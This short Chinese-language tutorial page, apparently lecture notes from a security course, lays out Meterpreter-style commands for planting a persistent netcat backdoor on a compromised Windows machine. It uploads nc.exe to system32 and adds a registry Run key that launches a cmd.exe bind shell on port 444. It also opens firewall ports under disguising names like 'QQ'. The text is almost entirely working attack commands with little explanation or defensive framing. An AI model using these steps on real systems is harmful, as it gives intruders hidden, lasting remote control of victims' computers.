T3SEC —–第八讲:nc后门

{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}

隐藏后门

1.nc后门上传

  • upload/root/nc.exe c:\\windows\system32

2.修改注册表

  • reg enumkey -k
    • HKLM\softfware\microsoft\windows\currentversion\run
  • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe' //添加nc键值
  • reg queryval -k
    • HKLM\software\microsoft\windows\currentversion\run -v nc //查看

3.防火墙 允许端口

  • execute -f cmd -i -H //生成shell
  • cmd: netsh firewall show opmode //查看防火墙状态.
  • netsh firewall add portopening tcp 444 "textx" ENABLE ALL
  • netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
  • netsh firewall add portopening TCP 7776 "QQ" ENABLE ALL

Q.E.D.